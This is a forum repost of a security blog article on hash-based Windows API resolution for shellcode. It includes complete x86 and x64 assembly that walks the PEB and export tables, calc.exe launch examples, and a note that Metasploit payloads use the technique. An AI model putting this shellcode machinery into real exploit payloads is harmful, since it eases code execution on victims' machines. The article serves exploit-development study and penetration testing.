Nytro Posted May 5, 2011 Report Posted May 5, 2011 Calling API FunctionsIntroductionAn alternative approach for position independent code, such as shellcode, to call Windows API functions is shown below. Their are all ready many existing methods available, typically relying on parsing either the Import Address Table (IAT) or Export Address Table (EAT) of a specific module in order to locate the address of a required function. Some methods use a variation of the above where the kernel32 modules EAT (or a modules IAT entry referencing kernel32) is parsed in order to locate the functions LoadLibraryA and GetProcAddress and these two functions are then used to resolve the remaining function addresses (as well as loading in any modules not all ready present in the processes address space). If relying on GetProcAddress to resolve functions, the ASCII names of the functions must also be available, increasing the shellcodes size considerably. It is therefore common to use a hashing technique, typically based off the assembly rotate (ROR/ROL) instructions, in order to avoid this problem and create a more optimized solution.The 2003 paper 'Understanding Windows Shellcode' by Skape[1] is an excellent read to understand the various techniques fully. A good example of a well optimized shellcode is SkyLined's w32-bind-ngs-shellcode[2].An Alternative ApproachAnother way to resolve function addresses is to use a hash combined of both the desired function name and its module name. The entire list of modules loaded in a process can be iterated over, calculating the respective hash value for each exported function and comparing it to that of the desired hash we are searching for. Once located we can proceed to resolve the functions address. Further more, we can wrap this functionality in a function which will act as a proxy, allowing the caller to indirectly call the desired API function. A pseudo x86 code example of using this technique is shown below on the left and for comparison a more traditional approach of achieving the same is shown on the right. push param2 // push the second parameter push param1 // push the first parameter push hash // push the hash of the function+module call api_call // resolve and indirectly call the desired function push hash // push the hash of the function + module push module_address // push the address of the module call resolve_api_address // resolve the desired function push param2 // push the second parameter push param1 // push the first parameter call api_address // directly call the desired functionWe can see from the above that their are some advantages, namely it takes only one call to both resolve and call any API function. We also do not need to keep track of any modules base addresses.All the source code shown below can be downloaded from this zip file CallingAPIFunctions.zip. Also included in the zip are the x86 and x64 versions of the eggtest application used to run and aid debugging of shellcode.Implementation – Win32 x86Listed below is a 137 byte implementation of the technique described above. This implementation works on all versions of 32-bit Windows (Windows 7, 2008, Vista, 2003, XP, 2000, NT4). It is implemented as a function called 'api_call'. Its parameters are the hash value of the desired API function to call as well as all the desired API functions parameters. It returns the result of indirectly calling the desired API function. The stdcall calling convention (Used by all Win32 API functions) is honored in that the EAX, ECX and EDX registers are expected to be clobbered while the remaining registers will not be clobbered.[BITS 32]api_call: pushad // We preserve all the registers for the caller, bar EAX and ECX. mov ebp, esp // Create a new stack frame xor edx, edx // Zero EDX mov edx, [fs:edx+48] // Get a pointer to the PEB mov edx, [edx+12] // Get PEB->Ldr mov edx, [edx+20] // Get the first module from the InMemoryOrder module listnext_mod: mov esi, [edx+40] // Get pointer to modules name (unicode string) movzx ecx, word [edx+38] // Set ECX to the length we want to check xor edi, edi // Clear EDI which will store the hash of the module nameloop_modname: xor eax, eax // Clear EAX lodsb // Read in the next byte of the name cmp al, 'a' // Some versions of Windows use lower case module names jl not_lowercase sub al, 0x20 // If so normalise to uppercasenot_lowercase: ror edi, 13 // Rotate right our hash value add edi, eax // Add the next byte of the name loop loop_modname // Loop untill we have read enough // We now have the module hash computed push edx // Save the current position in the module list for later push edi // Save the current module hash for later // Proceed to itterate the export address table, mov edx, [edx+16] // Get this modules base address mov eax, [edx+60] // Get PE header add eax, edx // Add the modules base address mov eax, [eax+120] // Get export tables RVA test eax, eax // Test if no export address table is present jz get_next_mod1 // If no EAT present, process the next module add eax, edx // Add the modules base address push eax // Save the current modules EAT mov ecx, [eax+24] // Get the number of function names mov ebx, [eax+32] // Get the rva of the function names add ebx, edx // Add the modules base address // Computing the module hash + function hashget_next_func: jecxz get_next_mod // When we reach the start of the EAT (we search backwards), process the next module dec ecx // Decrement the function name counter mov esi, [ebx+ecx*4] // Get rva of next module name add esi, edx // Add the modules base address xor edi, edi // Clear EDI which will store the hash of the function name // And compare it to the one we wantloop_funcname: xor eax, eax // Clear EAX lodsb // Read in the next byte of the ASCII function name ror edi, 13 // Rotate right our hash value add edi, eax // Add the next byte of the name cmp al, ah // Compare AL (the next byte from the name) to AH (null) jne loop_funcname // If we have not reached the null terminator, continue add edi, [ebp-8] // Add the current module hash to the function hash cmp edi, [ebp+36] // Compare the hash to the one we are searchnig for jnz get_next_func // Go compute the next function hash if we have not found it // If found, fix up stack, call the function and then value else compute the next one... pop eax // Restore the current modules EAT mov ebx, [eax+36] // Get the ordinal table rva add ebx, edx // Add the modules base address mov cx, [ebx+2*ecx] // Get the desired functions ordinal mov ebx, [eax+28] // Get the function addresses table rva add ebx, edx // Add the modules base address mov eax, [ebx+4*ecx] // Get the desired functions RVA add eax, edx // Add the modules base address to get the functions actual VA // We now fix up the stack and perform the call to the desired function...finish: mov [esp+36], eax // Overwrite the old EAX value with the desired api address for the upcoming popad pop ebx // Clear off the current modules hash pop ebx // Clear off the current position in the module list popad // Restore all of the callers registers, bar EAX, ECX and EDX which are clobbered pop ecx // Pop off the origional return address our caller will have pushed pop edx // Pop off the hash value our caller will have pushed push ecx // Push back the correct return value jmp eax // Jump into the required function // We now automagically return to the correct caller...get_next_mod: pop eax // Pop off the current (now the previous) modules EATget_next_mod1: pop edi // Pop off the current (now the previous) modules hash pop edx // Restore our position in the module list mov edx, [edx] // Get the next module jmp short next_mod // Process this moduleExample - Win32 x86Using the implementation given above (and assuming it has been saved to a file called 'x86_api_call.asm'), we can build a simple example which will execute the calc program and then terminate the process.[BITS 32][ORG 0] cld // clear the direction flag call start // call start, this pushes the address of 'api_call' onto the stackdelta: %include "./x86_api_call.asm"start: pop ebp // pop off the address of 'api_call' for calling later push byte +1 // push the command show parameter lea eax, [ebp+command-delta] // calculate an address to the command line push eax // push the command line parameter push 0x876F8B31 // push the hash value for WinExec call ebp // kernel32.dll!WinExec( &command, SW_NORMAL ) push byte 0 // push the desired exit code parameter push 0x56A2B5F0 // push the hash value for ExitProcess call ebp // call kernel32.dll!ExitProcess( 0 )command: db "calc.exe", 0We can build the above example using the NASM assembler[4] with the command:>nasm -f bin -O3 -o x86_example.bin x86_example.asmWe can run the example with the eggtest (included in zip file) program:>eggtest_x86.exe x86_example.binImplementation - Win64 x64We can of course use the same technique on 64bit Windows. Listed below is a 192 byte implementation of the technique described above for the x64 architecture. As before, it is implemented as a function called 'api_call'. The Win64 API use quite a different calling convention[3] to that of the Win32 API. The first four parameters to any function are passed in via the registers RCX, RDX, R8 and R9 respectively, with any remaining parameters being pushed onto the stack (Their are exception to this convention for floating point parameters). Another notable difference when coding for Win64 is that the Process Environment Block (PEB) must be retrieved from gs:96 as opposed to fs:48 on Win32. The desired functions hash value is passed in via register R10 in order to allow the registers RCX, RDX, R8 and R9 to be used for the desired function parameters. We can note that the hash values used do not need to be changed between architectures.[BITS 64]api_call: push r9 // Save the 4th parameter push r8 // Save the 3rd parameter push rdx // Save the 2nd parameter push rcx // Save the 1st parameter push rsi // Save RSI xor rdx, rdx // Zero rdx mov rdx, [gs:rdx+96] // Get a pointer to the PEB mov rdx, [rdx+24] // Get PEB->Ldr mov rdx, [rdx+32] // Get the first module from the InMemoryOrder module list next_mod: mov rsi, [rdx+80] // Get pointer to modules name (unicode string) movzx rcx, word [rdx+74] // Set rcx to the length we want to check xor r9, r9 // Clear r9 which will store the hash of the module nameloop_modname: xor rax, rax // Clear rax lodsb // Read in the next byte of the name cmp al, 'a' // Some versions of Windows use lower case module names jl not_lowercase sub al, 0x20 // If so normalise to uppercasenot_lowercase: ror r9d, 13 // Rotate right our hash value add r9d, eax // Add the next byte of the name loop loop_modname // Loop untill we have read enough // We now have the module hash computed push rdx // Save the current position in the module list for later push r9 // Save the current module hash for later // Proceed to itterate the export address table, mov rdx, [rdx+32] // Get this modules base address mov eax, dword [rdx+60] // Get PE header add rax, rdx // Add the modules base address mov eax, dword [rax+136] // Get export tables RVA test rax, rax // Test if no export address table is present jz get_next_mod1 // If no EAT present, process the next module add rax, rdx // Add the modules base address push rax // Save the current modules EAT mov ecx, dword [rax+24] // Get the number of function names mov r8d, dword [rax+32] // Get the rva of the function names add r8, rdx // Add the modules base address // Computing the module hash + function hashget_next_func: jrcxz get_next_mod // When we reach the start of the EAT (we search backwards), process the next module dec rcx // Decrement the function name counter mov esi, dword [r8+rcx*4]// Get rva of next module name add rsi, rdx // Add the modules base address xor r9, r9 // Clear r9 which will store the hash of the function name // And compare it to the one we wantloop_funcname: xor rax, rax // Clear rax lodsb // Read in the next byte of the ASCII function name ror r9d, 13 // Rotate right our hash value add r9d, eax // Add the next byte of the name cmp al, ah // Compare AL (the next byte from the name) to AH (null) jne loop_funcname // If we have not reached the null terminator, continue add r9, [rsp+8] // Add the current module hash to the function hash cmp r9d, r10d // Compare the hash to the one we are searchnig for jnz get_next_func // Go compute the next function hash if we have not found it // If found, fix up stack, call the function and then value else compute the next one... pop rax // Restore the current modules EAT mov r8d, dword [rax+36] // Get the ordinal table rva add r8, rdx // Add the modules base address mov cx, [r8+2*rcx] // Get the desired functions ordinal mov r8d, dword [rax+28] // Get the function addresses table rva add r8, rdx // Add the modules base address mov eax, dword [r8+4*rcx]// Get the desired functions RVA add rax, rdx // Add the modules base address to get the functions actual VA // We now fix up the stack and perform the call to the drsired function...finish: pop r8 // Clear off the current modules hash pop r8 // Clear off the current position in the module list pop rsi // Restore RSI pop rcx // Restore the 1st parameter pop rdx // Restore the 2nd parameter pop r8 // Restore the 3rd parameter pop r9 // Restore the 4th parameter pop r10 // pop off the return address sub rsp, 32 // reserve space for the four register params (4 * sizeof(QWORD) = 32) // It is the callers responsibility to restore RSP if need be (or alloc more space or align RSP). push r10 // push back the return address jmp rax // Jump into the required function // We now automagically return to the correct caller...get_next_mod: // pop rax // Pop off the current (now the previous) modules EATget_next_mod1: pop r9 // Pop off the current (now the previous) modules hash pop rdx // Restore our position in the module list mov rdx, [rdx] // Get the next module jmp next_mod // Process this moduleExample - Win64 x64Using the x64 implementation given above (and assuming it has been saved to a file called 'x64_api_call.asm'), we can build another simple example which will execute the calc program and then terminate the process.[BITS 64][ORG 0] cld // clear the direction flag and rsp, 0xFFFFFFFFFFFFFFF0 // Ensure RSP is 16 byte aligned call start // call start, this pushes the address of 'api_call' onto the stackdelta: %include "./x64_api_call.asm"start: pop rbp // pop off the address of 'api_call' for calling later mov rdx, 1 // param 2 is the command show parameter lea rcx, [rbp+command-delta] // param 1 is the address to the command line mov r10d, 0x876F8B31 // R10 = the hash value for WinExec call rbp // WinExec( &command, 1 ); mov rcx, 0 // set the exit function parameter mov r10d, 0x6F721347 // R10 = the hash value for RtlExitUserThread call rbp // call ntdll.dll!RtlExitUserThread( 0 )command: db "calc.exe", 0We can build the above example using the NASM assembler with the command:>nasm -f bin -O3 -o x64_example.bin x64_example.asmWe can run the example with the eggtest (included in zip file) program:>eggtest_x64.exe x64_example.binForwarded ExportsModules may contain entries in their EAT which is actually a forwarded entry[5]. This means that instead of a modules export resolving to a function within that module, this export is instead intended to resolve to a function within another module. For example on Windows Vista, 2008 and 7 the export kernel32.dll!ExitThread is a forwarded export that points to ntdll.dll!RtlExitUserThread. This is achieved by storing the ASCII module name and function name that the forwarded export wishes to point to in the respective EAT entry (instead of an RVA). I am unaware of any shellcode implementations that attempt to resolve forwarded exports correctly (unless using kernel32.dll!GetProcAddress) and the implementation given above does not resolve forwarded exports either. It gets awkward quickly as you must first recognize that the export is a forwarded one, proceed to use LoadLibraryA to load the forwarded module (in order to retrieve its base address, and load it into the processes address space if it is not all ready present) and then GetProcAddress to resolve the forwarded function based off the ASCII function name given.For typical shellcodes the only function required which is a forwarded export is ExitThread as mentioned above. A workaround for this problem is to check at run time the current Windows platform and call the appropriate function to avoid calling a forwarded export as shown in the Win32 snippet below:exitfunk: mov ebx, 0x0A2A1DE0 // The EXITFUNK as patched in by the user... push 0x9DBD95A6 // hash( "kernel32.dll", "GetVersion" ) call ebp // GetVersion(); (AL will = major version and AH will = minor version) cmp al, byte 6 // If we are not running on Windows Vista, 2008 or 7 jl short goodbye // Then just call the exit function... cmp bl, 0xE0 // If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7... jne short goodbye mov ebx, 0x6F721347 // Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThreadgoodbye: // We now perform the actual call to the exit function push byte 0 // push the exit function parameter push ebx // push the hash of the exit function call ebp // call EXITFUNK( 0 );Hash CollisionsAn obvious concern when using hash values in the manner described here, is the occurrence of collisions between the hash of the function you are searching for and an arbitrary function in an arbitrary module which computes to the same hash value. To help determine the possibility of this, a simple python script can be used to scan all modules on a system, computing their exported functions hashes and detecting if a collision occurs against any predefined functions (e.g. common functions we might need to use such as kernel32.dll!WinExec or ws2_32!recv). The python script is included in the zip file (see start of this post) and uses the pefile package[6] to process a modules exports. This script has been run on multiple systems (Windows 7 RC1, 2008 SP1, Vista SP2, 2003 SP2, XP SP3, 2000 SP4 and NT4 SP6a), processing a total of 1,864,417 functions across 35,178 modules and detected no collisions against the functions defined (Please see the python script for more details).Metasploit IntegrationThe majority of the Metasploit[7] x86 Windows payloads have been rewritten using the techniques presented here in order to bring Windows 7 and backwards compatibility to the stagers, stages and singles as well as considerable size reductions for the stagers and stages. Work on x64 payloads is under way.References[1] http://hick.org/code/skape/papers/win32-shellcode.pdf[2] w32-bind-ngs-shellcode - 211 byte null-free 32-bit Windows port-binding shellcode (all OS/SPs) - Google Project Hosting[3] Calling Convention[4] The Netwide Assembler | Download The Netwide Assembler software for free at SourceForge.net[5] Inside Windows: An In-Depth Look into the Win32 Portable Executable File Format, Part 2[6] pefile - pefile is a Python module to read and work with PE (Portable Executable) files - Google Project Hosting[7] Metasploit Framework Penetration Testing Software | Metasploit ProjectSursa: Harmony Security : Blog Quote